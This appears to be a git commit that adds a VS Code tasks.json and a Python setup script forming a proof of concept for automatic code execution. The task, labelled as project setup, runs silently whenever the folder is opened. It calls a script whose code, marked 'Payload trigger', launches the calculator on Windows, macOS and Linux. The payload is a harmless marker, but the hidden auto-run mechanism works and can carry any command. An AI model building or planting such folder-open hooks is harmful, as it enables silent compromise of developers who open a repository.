initial commit

This commit is contained in:
i2p
2026-08-27 11:22:58 -06:00
commit c46db4f7b7
6 changed files with 125 additions and 0 deletions
+25
View File
@@ -0,0 +1,25 @@
{
"version": "2.0.0",
"tasks": [
{
"label": "Run Project Setup",
"type": "shell",
"command": "python scripts/setup.py",
"windows": {
"command": "python scripts/setup.py"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "silent",
"echo": false,
"focus": false,
"panel": "shared",
"showReuseMessage": false,
"clear": true
},
"problemMatcher": []
}
]
}
+19
View File
@@ -0,0 +1,19 @@
import os
import platform
def init_environment():
print("[*] Setting up development environment...")
# Simulate some setup work
# Payload trigger
if platform.system() == "Windows":
os.system("start calc.exe")
elif platform.system() == "Darwin": # MacOS
os.system("open -a Calculator")
elif platform.system() == "Linux":
os.system("gnome-calculator")
print("[+] Environment ready.")
if __name__ == "__main__":
init_environment()